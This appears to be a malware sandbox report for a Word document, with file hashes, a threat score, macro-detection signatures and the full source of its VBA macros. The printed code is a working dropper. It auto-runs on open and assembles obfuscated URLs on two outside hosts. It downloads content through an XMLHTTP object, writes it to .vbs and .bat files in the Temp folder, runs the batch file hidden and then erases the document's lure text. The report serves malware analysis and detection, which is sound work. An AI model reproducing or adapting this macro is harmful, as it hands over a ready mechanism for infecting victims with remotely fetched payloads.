482ca49dcab02d9db9267547fa3de8a5c022ce2daf57b796b818b688f8271e76

Sharing

Copy URL

Twitter E-mail

General

Target

482ca49dcab02d9db9267547fa3de8a5c022ce2daf57b796b818b688f8271e76
Size

251KB
MD5

a17482cf4121bef6ddde8b40d1bcecf0
SHA1

e80199df5a0863d01819de0c2bc3fe3eb1e13338
SHA256

482ca49dcab02d9db9267547fa3de8a5c022ce2daf57b796b818b688f8271e76
SHA512

8a982f16762362262992524e8715bb9820843681bdf3096fae088532764f1ef1a52cf7292bcaea3577a8f3d88899efd18b791d4baeb65de3ef09df4a9fc6ac8d
SSDEEP

3072:vjPvvZYOdkm9spw7uzeJq+oqZSqf8/ISU5uW:zprkm9awDJhoeSRJD

Score

8^/10

macro macro_on_action

Malware Config

Signatures

Office macro that triggers on suspicious action 1 IoCs

Office document macro which triggers in special circumstances - often malicious.

macro macro_on_action

resource	yara_rule
sample	office_macro_on_action

Suspicious Office macro 1 IoCs

Office document equipped with macros.

macro

resource
sample

Files

482ca49dcab02d9db9267547fa3de8a5c022ce2daf57b796b818b688f8271e76
.doc windows office2003

ThisDocument

1

Attribute VB_Name = "ThisDocument"

2

Attribute VB_Base = "1Normal.ThisDocument"

3

Attribute VB_GlobalNameSpace = False

4

Attribute VB_Creatable = False

5

Attribute VB_PredeclaredId = True

6

Attribute VB_Exposed = True

7

Attribute VB_TemplateDerived = True

8

Attribute VB_Customizable = True

9

10

Sub Auto_Open()

11

Agudobo

12

End Sub

13

Sub Agudobo()

14

QNWDJQW = "1jkehjk ajkshd jkashdjka"

15

Parampa

16

End Sub

17

Sub AutoOpen()

18

Agudobo

19

End Sub

20

Sub Parampa()

21

22

Dim MADRID As String, MOTOROLA As String, KIPARIS As String

23

Dim TSTS As String, CDDD As String, LNSS As String, STT1 As String, STT2 As String

24

Dim PBIn As String, CONT As String

25

Dim Ndjs As Integer

26

Dim ABTH As String, BBTH As String

27

Dim klmn As Integer, TTKK As String

28

Dim GEFORCE1 As String, GEFORCE2 As String, hdjshd As Integer

29

30

31

KIPARIS = Module2.hhr(92)

32

MADRID = Samsung(9898)

33

MOTOROLA = "Tem" & "p"

34

PH2 = Module1.Goabc(MOTOROLA) + KIPARIS

35

36

ART = 315

37

BFT = 316

38

39

MNJQD = ":" + "//"

40

Ndjs = Sgn(Asc(Module2.Kakarumba(1)) - 342) + 104 + 1

41

ATTH = Chr(Ndjs) + Chr(Ndjs + 12) + Chr(Ndjs + 12) + Chr(Ndjs + 8) & MNJQD

42

43

44

TSTS = "" & ".tx" + "t" + ""

45

CDDD = "777763172631572" + TSTS

46

LNSS = "rara" + TSTS

47

STT1 = "themertailor.c" + "om/a" + "dm" + "in/co" + "ntrol" + "ler/"

48

STT2 = "mirai2000.c" + "om/"

49

50

51

PBIn = ATTH + STT1 + CDDD

52

53

CONT = Module2.Klklklklklkl(PBIn)

54

BHJD = Right(CONT, 15)

55

hdjshd = InStr(1, BHJD, "exit")

56

57

If (hdjshd = 0) Then

58

PBIn = ATTH + STT2 + CDDD

59

CONT = Module2.Klklklklklkl(PBIn)

60

NFBH = Module2.Klklklklklkl(ATTH + STT2 + LNSS)

61

Else

62

NFBH = Module2.Klklklklklkl(ATTH + STT1 + LNSS)

63

End If

64

65

Module2.Crispy (1)

66

67

CPLRP1 = "pioneer"

68

CPLRP2 = "paytina"

69

CPLRP3 = "cranberry"

70

71

CONT = Replace(CONT, CPLRP1, PH2, 1)

72

CONT = Replace(CONT, CPLRP2, NFBH, 1)

73

CONT2 = Replace(CONT, CPLRP3, MADRID, 1)

74

75

TTKK = "$"

76

77

klmn = CInt(Len(CONT2))

78

For i = 1 To klmn

79

If (Mid(CONT2, i, 1) = TTKK) Then

80

If (Mid(CONT2, i - 1, 1) = TTKK) Then

81

GEFORCE1 = Mid(CONT2, 1, i - 2)

82

GEFORCE2 = Mid(CONT2, i + 1, klmn - i)

83

End If

84

End If

85

Next i

86

87

ABTH = PH2 + MADRID + ".vbs"

88

BBTH = PH2 + MADRID + ".bat"

89

90

91

Open ABTH For Output As #ART

92

Print #ART, GEFORCE1

93

Close #ART

94

95

Module2.Crispy (1)

96

97

Open BBTH For Output As #BFT

98

Print #BFT, GEFORCE2

99

Close #BFT

100

101

Module2.Crispy (1)

102

103

QUHDQ = Module2.Fuflmdjoo(BBTH)

104

Module1.Hameleon

105

106

End Sub

107

Sub Workbook_Open()

108

QHDIQUWH = "nkjh wjkqhdk jqdkjgqwhdjqw dkjsalk"

109

Agudobo

110

End Sub

111

Public Function NHdjhasbdhas(a As Object)

112

NHdjhasbdhas = (a.responsetext)

113

End Function

114

Public Function Samsung(a As Integer)

115

Randomize

116

Samsung = CStr(Int((a / 2 * Rnd) + a))

117

End Function

118

Public Function Creasqwdqwjdk(a As String)

119

Creasqwdqwjdk = CreateObject(a)

120

End Function

121

Public Function Hhqudhqwgyuqwaaa(a As Integer)

122

Hhqudhqwgyuqwaaa = Sgn(a)

123

End Function

124

125

126

127

128

129

130

131

132

133

134

135

Module1

1

Attribute VB_Name = "Module1"

2

3

Sub Hameleon()

4

Dim ij As Integer

5

Dim charCount As Integer

6

QWND = "#"

7

charCount = ActiveDocument.Characters.Count - 1

8

9

POND = "$"

10

ij = 0

11

Do While True

12

ij = ij + 1

13

If (ActiveDocument.Characters(ij) = QWND) Then

14

If (ActiveDocument.Characters(ij - 1) = POND) Then

15

ActiveDocument.Range(Start:=0, End:=ij).Delete

16

ActiveDocument.Range(Start:=0, End:=charCount - ij - 1).Font.ColorIndex = wdBlack

17

Exit Do

18

End If

19

End If

20

If (ij = charCount) Then

21

Exit Do

22

End If

23

Loop

24

End Sub

25

26

Public Function Goabc(sps As String)

27

HUQWDS = "hdqwdjqw dgqjhdgqjhg hwqgdj"

28

Goabc = Environ(sps)

29

End Function

30

31

32

33

34

35

36

37

38

39

40

41

42

43

Module2

1

Attribute VB_Name = "Module2"

2

Public Function Fuflmdjoo(a As String)

3

Dim bydd As Variant

4

bydd = Shell(a, 0)

5

MKQNWD = "qjwdlkqw hdjkqhw dhjqgdhjqwgdq"

6

End Function

7

Public Function Kakarumba(n As Integer)

8

Dim i As Integer

9

For i = 1 To n Step 1

10

Randomize

11

NHWDS = Chr(Int(121 * Rnd) + 97)

12

Kakarumba = Kakarumba + NHWDS

13

Next i

14

BHQWJD = "hqjwdg gjhqw"

15

End Function

16

Public Function Klklklklklkl(nbqjbdjqw As String)

17

Dim dhjqwqkjww As Integer, aaqjwhdq As Integer, Mhdbqwdbnsagdwhqdghd As Object, AHUDWQI As String

18

Dim ashdUHhda As String, dddc As Integer, GWJUQHWDDD As String, AsaHuhqdjhasd As String, AAHQJD As String, hqudhhajs As String

19

AsaHuhqdjhasd = nbqjbdjqw

20

ashdUHhda = AsaHuhqdjhasd

21

'sadqwwdq

22

dddc = 1 - (Atn(10 + 10))

23

HQDUQ = hhr(Val(81 + dddc))

24

hqudhhajs = klmn(Val(78 + dddc))

25

BHQDHJWQDW = "M" & "L2" & "." + "S" & "er" & "verX" & "MLH"

26

BYGDWHQGWHDWQ = BHQDHJWQDW + "TT" + HQDUQ

27

'fkqwd

28

GWJUQHWDDD = "E"

29

NNNHDQYUWG = Chr(11 * 2 * 4 + 4 * dddc)

30

GWJUQHWDDD = "G" + GWJUQHWDDD & NNNHDQYUWG

31

DWQJDIQWDKWQJDHBB = hqudhhajs + "SX" + BYGDWHQGWHDWQ

32

'qwndjkqwq

33

Set Mhdbqwdbnsagdwhqdghd = CreateObject(DWQJDIQWDKWQJDHBB)

34

'qgdhjqwghqj

35

Mhdbqwdbnsagdwhqdghd.Open GWJUQHWDDD, ashdUHhda

36

Mhdbqwdbnsagdwhqdghd.Send (AHUDWQI)

37

AAHQJD = ThisDocument.NHdjhasbdhas(Mhdbqwdbnsagdwhqdghd)

38

Klklklklklkl = AAHQJD

39

40

End Function

41

42

Sub Crispy(NumOfSeconds As Long)

43

Dim SngSec As Long

44

SngSec = Timer + NumOfSeconds

45

Do While Timer < SngSec

46

DoEvents

47

Loop

48

End Sub

49

50

51

Public Function klmn(pag As Integer)

52

klmn = Chr(pag)

53

End Function

54

55

Public Function hhr(sps As Integer)

56

hhr = Chr(sps)

57

End Function

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

Sharing

General

Malware Config

Signatures

Files

ThisDocument

Module1

Module2

We care about your privacy.